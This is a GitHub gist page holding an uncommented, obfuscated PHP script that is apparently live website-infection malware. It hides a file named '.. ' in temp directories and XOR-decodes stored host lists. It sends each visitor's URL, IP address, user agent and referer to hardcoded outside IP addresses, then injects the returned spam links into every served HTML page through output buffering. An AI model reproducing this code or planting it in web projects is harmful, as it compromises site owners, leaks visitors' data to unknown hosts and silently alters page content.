Skip to content

Instantly share code, notes, and snippets.

@thejh

thejh/gist:8606427

Created January 24, 2014 21:06
Show Gist options
  • Save thejh/8606427 to your computer and use it in GitHub Desktop.
Save thejh/8606427 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.php
error_reporting(0);
if (!function_exists("ZM5j2q0shf_pirogok")){
function ZM5j2q0shf_pirogok(){
return false;
}
function Uno_decode($String)
{
$String = base64_decode($String);
$Salt="dc5p9dOpBc";
$StrLen = strlen($String);
$Seq = "DMEf5HZuPq";
$Gamma = "";
while (strlen($Gamma)<$StrLen)
{
$Seq = pack("H*",sha1($Gamma.$Seq.$Salt));
$Gamma.=substr($Seq,0,8);
}
return $String^$Gamma;
}
function get_t_dir_mass() {
if (function_exists("sys_get_temp_dir")) {
if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
}
if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { $res[] = realpath($_ENV["TMP"]); }
if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { $res[] = realpath( $_ENV["TMPDIR"]); }
if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { $res[] = realpath( $_ENV["TEMP"]); }
$tempfile=@tempnam(__FILE__,"");
if (@file_exists($tempfile)) {
@unlink($tempfile);
if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }
}
if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
if (@is_writeable(realpath(dirname(__FILE__)))) { $res[] = realpath(dirname(__FILE__)); }
return array_unique($res);
}
function get_ua(){
$name = get_true_name();
foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".") === false){
$tmp = explode("|",$tt);
foreach($tmp as $u){
$know[] = trim($u);
}
}
}
}
}
if(count($know) == 0){
$know[] = "msie";
$know[] = "firefox";
$know[] = "googlebot";
}
return array_unique($know);
}
function get_true_name(){
return ".. ";
}
function strposa($haystack, $needle, $offset=0) {
if(!is_array($needle)) $needle = array($needle);
foreach($needle as $query) {
if(strpos($haystack, $query, $offset) !== false) return true;
}
return false;
}
if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$true_ua = get_ua();
if (strposa($ua,$true_ua)){
function t_dir() {
if (function_exists("sys_get_temp_dir")) {
if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
}
if (!empty($_ENV["TMP"]) && @is_writeable(realpath($_ENV["TMP"]))) { return realpath($_ENV["TMP"]); }
if (!empty($_ENV["TMPDIR"]) && @is_writeable(realpath($_ENV["TMPDIR"]))) { return realpath( $_ENV["TMPDIR"]); }
if (!empty($_ENV["TEMP"]) && @is_writeable(realpath($_ENV["TEMP"]))) { return realpath( $_ENV["TEMP"]); }
$tempfile=@tempnam(__FILE__,"");
if (@file_exists($tempfile)) {
@unlink($tempfile);
if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }
}
if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
if (@is_writeable(realpath(dirname(__FILE__)))) { return realpath(dirname(__FILE__)); }
return null;
}
function get_know_ip(){
$know[] = "151.236.14.86";
$know[] = "149.154.157.133";
$know[] = "37.235.54.48";
$know[] = "31.215.205.196";
$name = get_true_name();
foreach(get_t_dir_mass() as $t){
if(file_exists($t.DIRECTORY_SEPARATOR.$name)){
foreach (file($t.DIRECTORY_SEPARATOR.$name) as $tt){
$tt = Uno_decode($tt);
if(strpos($tt,".")>0){
$know[] = trim($tt);
}
}
}
}
return array_unique($know);
}
function save_know_ip($ip){
$name = get_true_name();
$content = implode(PHP_EOL, $ip);
foreach(get_t_dir_mass() as $t){
$f = fopen($t.DIRECTORY_SEPARATOR.$name,"w");
fputs($f,$content);
fclose($f);
}
}
function ZM5j2q0shf_get_real_ip() {
$proxy_headers = array("CLIENT_IP","FORWARDED","FORWARDED_FOR","FORWARDED_FOR_IP","HTTP_CLIENT_IP","HTTP_FORWARDED","HTTP_FORWARDED_FOR","HTTP_FORWARDED_FOR_IP", "HTTP_PC_REMOTE_ADDR","HTTP_PROXY_CONNECTION","HTTP_VIA", "HTTP_X_FORWARDED", "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_FOR_IP","HTTP_X_IMFORWARDS","HTTP_XROXY_CONNECTION","VIA", "X_FORWARDED", "X_FORWARDED_FOR");
foreach($proxy_headers as $proxy_header) {
if(isset($_SERVER[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_SERVER[$proxy_header])) {
return $_SERVER[$proxy_header];
} else if(stristr(",", $_SERVER[$proxy_header]) !== FALSE) {
$proxy_header_temp = trim(array_shift(explode(",", $_SERVER[$proxy_header])));
if(($pos_temp = stripos($proxy_header_temp, ":")) !== FALSE) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);
if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
}
}
return $_SERVER["REMOTE_ADDR"];
}
function ZM5j2q0shf_get_url(){
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
if (strpos($url,"?") !== false){
$url = substr($url,0,strpos($url,"?"));
}
return $url;
}
function ZM5j2q0shf_get_contents($ip, $page){
if( function_exists("curl_init") ){
$ch = curl_init("http://" .$ip . "/" .$page);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
$ult = trim(curl_exec($ch));
return $ult;
}
if (ini_get("allow_url_fopen")) {
$ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
return $ult;
}
$fp = fsockopen($ip, 80, $errno, $errstr, 30);
if ($fp) {$out = "GET $page HTTP/1.0\r\n";
$out .= "Host: $ip\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
$ret = "";
while (!feof($fp)) {$ret .= fgets($fp, 128);}
fclose($fp);
$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));}
return $ult;
}
function ZM5j2q0shf_samui_get_links(){
$all = get_know_ip();
shuffle($all);
$url = ZM5j2q0shf_get_url();
$real_ip = ZM5j2q0shf_get_real_ip();
$ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
$aid = "1001";
$cod = md5($url.time());
$check = md5($cod);
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
$ref = urlencode(strtolower($_SERVER["HTTP_REFERER"]));
$page = "/ml.php?mother=www.wpgeositemap.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;
foreach ($all as $ip){
$tc = ZM5j2q0shf_get_contents(trim($ip),$page);
$pos = strpos($tc, $check);
if ($pos !== false){
$proxy_list = substr($tc,0,$pos);
save_know_ip(explode("\n",$proxy_list));
$links = substr($tc,$pos+32);
return $links;
}
}
}
function ZM5j2q0shf_mod_con($con){
if (strpos($con,"<body") !== false) {
$text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".ZM5j2q0shf_samui_get_links(), $con,1);
return $text;
} else {return $con;}
}
function ZM5j2q0shf_callback($buf){
if (headers_sent()){
if (in_array("Content-Encoding: gzip", headers_list())){
$tmpfname = tempnam(t_dir(), "FOO");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = ZM5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = ZM5j2q0shf_mod_con($buf); }} else {$contents = ZM5j2q0shf_mod_con($buf);}return($contents);
}
ob_start("ZM5j2q0shf_callback");
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment